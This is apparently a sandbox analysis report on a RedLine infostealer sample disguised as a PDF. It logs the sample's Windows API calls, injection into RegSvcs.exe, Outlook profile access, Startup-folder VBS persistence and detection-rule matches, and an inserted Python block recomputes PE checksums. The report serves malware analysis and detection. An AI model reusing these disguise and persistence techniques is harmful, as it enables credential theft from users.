    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004096A0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0042200C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0041A217
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00412216
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0042435D
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004033C0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044F430
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004125E8
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044663B
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00413801
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0042096F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004129D0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004119E3
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0041C9AE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0047EA6F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0040FA10
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044EB5F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00423C81
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00411E78
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00442E0C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00420EC0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044CF17
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00444FD2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_03F20B18
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_03FD3690
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004096A0
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0042200C
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0041A217
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00412216
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0042435D
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004033C0
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044F430
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004125E8
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044663B
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00413801
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0042096F
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004129D0
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004119E3
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0041C9AE
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0047EA6F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0040FA106_2_0040FA10
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044EB5F6_2_0044EB5F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00423C816_2_00423C81
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00411E786_2_00411E78
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442E0C6_2_00442E0C
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00420EC06_2_00420EC0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044CF176_2_0044CF17
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00444FD26_2_00444FD2
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1FE806_2_03F1FE80
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_03F936908_2_03F93690
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 36 times
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 39 times
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 65 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 004115D7 appears 36 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 00416C70 appears 39 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 00445AE0 appears 65 times
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: 8.2.name.exe.1690000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 2.2.name.exe.2b70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 6.2.name.exe.37b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@18/3@2/2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,6_2_00464EAE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\iodizationJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCommand line argument: #v0_2_0040D6B0
    Source: C:\Users\user\AppData\Local\directory\name.exeCommand line argument: #v6_2_0040D6B0
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: INDIA - VSL PARTICULARS.pdf.exeVirustotal: Detection: 27%
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile read: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic file information: File size 1285979 > 1048576
    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
    Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x13e000
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: real checksum: 0xa961f should be: 0x13e000
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1C128 push eax; ret 6_2_03F1C129
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file
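The two "real checksum ... should be" lines above say the stored OptionalHeader.CheckSum of the sample and its dropped copy do not match the value recomputed over the file. That is quick to confirm on any PE without trusting the sandbox. The block below is an added example, not part of the Joe Sandbox report or of the sample: it recomputes the checksum with the same 32-bit word sum, end-around carry, 16-bit fold and file-length addition that pefile's generate_checksum implements, and runs it on a constructed minimal PE32 header rather than on this report's binary. Treat a mismatch as a triage hint only: unsigned, packed or hand-assembled files usually carry a zero or stale checksum, while kernel drivers and signed Microsoft binaries are expected to be correct.

```python
"""Recompute and verify the PE header CheckSum (added example, not report code).
Sample bytes come from build_sample(), a constructed header, not from the sample."""
import struct


def checksum_offset(data):
    """File offset of OptionalHeader.CheckSum: e_lfanew + 4 (PE\\0\\0) + 20 (COFF) + 64.
    The field sits at +64 in both PE32 and PE32+ optional headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 24 + 64


def pe_checksum(data):
    """Sum 32-bit words with end-around carry, skipping the CheckSum field itself,
    fold to 16 bits, then add the unpadded file length."""
    skip = checksum_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)     # pad to a dword boundary
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def header_checksum(data):
    """Value currently stored in the header."""
    return struct.unpack_from("<I", data, checksum_offset(data))[0]


def verify(data):
    """Return (stored, computed, match)."""
    stored, computed = header_checksum(data), pe_checksum(data)
    return stored, computed, stored == computed


def with_checksum(data, value):
    """Copy of the image with the CheckSum field set to value."""
    off = checksum_offset(data)
    return data[:off] + struct.pack("<I", value) + data[off + 4:]


def build_sample():
    """Constructed 1 KiB image: MZ stub, PE signature at 0x80, PE32 optional header
    with CheckSum left at zero, and non-trivial filler after the headers."""
    buf = bytearray(1024)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)        # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x84, 0x14C, 1)   # Machine = i386, one section
    struct.pack_into("<H", buf, 0x98, 0x10B)       # optional header magic PE32
    buf[0x200:] = bytes(range(256)) * ((1024 - 0x200) // 256)
    return bytes(buf)


if __name__ == "__main__":
    stored, computed, ok = verify(build_sample())
    print(f"stored=0x{stored:x} computed=0x{computed:x} match={ok}")
```

Point pe_checksum at the raw file bytes of a real sample (open(path, "rb").read()) and compare with the header value the same way; with_checksum is only there so the round trip can be checked on the constructed image.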

    Boot Survival

    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
